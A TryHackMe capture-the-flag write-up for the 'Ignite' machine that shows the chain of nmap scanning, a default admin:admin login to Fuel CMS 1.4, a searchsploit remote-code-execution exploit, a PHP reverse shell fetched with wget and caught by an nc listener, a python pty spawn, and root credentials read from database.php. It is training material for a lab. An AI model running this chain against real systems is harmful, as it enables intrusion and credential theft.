Ignite — TryHackMe — Writeup
Hello. I’m Rahmos. Here is my Ignite — TryHackMe — Writeup. Check it out!
First, let nmap to see which ports the machine is opening.
nmap -A -T5 -v <ip>
We see there is a port 80. So let’s access its website.
Now i know the website is running CMS Fuel version 1.4. This will be important for us to search for exploit.
Click Ctrl+U to view page source and find some interesting information.
Now I have the admin login page and password. Access to http://<ip>/fuel/login and login with the credential admin:admin
Now I’m in. I’ve tried to upload a shell into the machine through this admin site, but it didn’t work. So I will try another way. Let’s search for CMS exploit using searchsploit
searchsploit CMS fuel
I see an Remote Code Execution exploit which matches our CMS version. So let’s google this and download the python script from:
Execute the python script and we can execute command in the target machine. Now input the cmd “pwd” to see which folder we are in now.
We are in the website folder. Which means that if we can upload a shell here, we can access the shell directly from our browser.
Let’s spawn a http server using python http.server (if you are using python 3) or SimpleHTTPServer (if you are using python 2). Cd to the folder contains your php reverse shell and type this cmd:
python http.server 9000 (python 3)
python SimpleHTTPServer 9000 (python 2)
Now let’s download the shell into our machine using wget. Change the cmd in the python script like this:
*Remember the host-ip is your Tryhackme VPN IP, not your real IP. You can find your VPN ip by accessing 10.10.10.10
Now use nc to open a listener:
nc -lvnp 4444
Run the script and then access in your web browser:
http://<machine-ip>/php-reverse-shell.php
Now that we have our shell! Let’ explore and get the user.txt flag.
We need to get root to find the root.txt flag which placed in the /root folder.
You can find root credential under /var/www/html/fuel/application/config/database.php
In order to su root, you need a tty. Spawn a tty using python:
python -c ‘import pty; pty.spawn(“/bin/bash”)’
Then su root using the credential above.
cd to /root and cat the root.txt file.
The end.
HAPPY HACKING